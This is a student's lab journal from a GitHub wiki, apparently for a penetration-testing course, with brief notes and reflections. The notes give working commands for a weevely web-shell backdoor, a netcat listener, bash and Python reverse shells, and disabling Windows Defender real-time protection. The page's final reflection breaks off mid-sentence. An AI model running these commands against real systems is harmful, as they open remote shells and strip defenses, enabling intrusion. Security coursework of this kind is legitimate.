Module 8 - skyleroriordan/my-tech-journal GitHub Wiki
8.1
notes
to generate weevely backdoor use: weevely generate {password} {name of backdoor}
to target use: weevely http://{ip of host}{location of backdoor} {password}
reflection
I found this weeks lab to be much easier compared to previous weeks. Weevely seems pretty straightforward and I think I got a good grasp on it.
8.2
notes
to start listener I used nc -nlvp 4449
to get a reverse shell to connect to listener used /bin/bash -i >& /dev/tcp/{IP_of_listener}/{listening_port} 0>&1
to turn off Windows Defender use Set-MpPreference -DisableRealtimeMonitoring $true in Powershell
to get a python reverse shell use python3 -c 'import sys, os, socket, pty;s=socket.socket(socket.AF_INET, socket.SOCK_STREAM);s.connect(('10.0.17.103',4449));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn('/bin/bash');"
Reflection
This lab was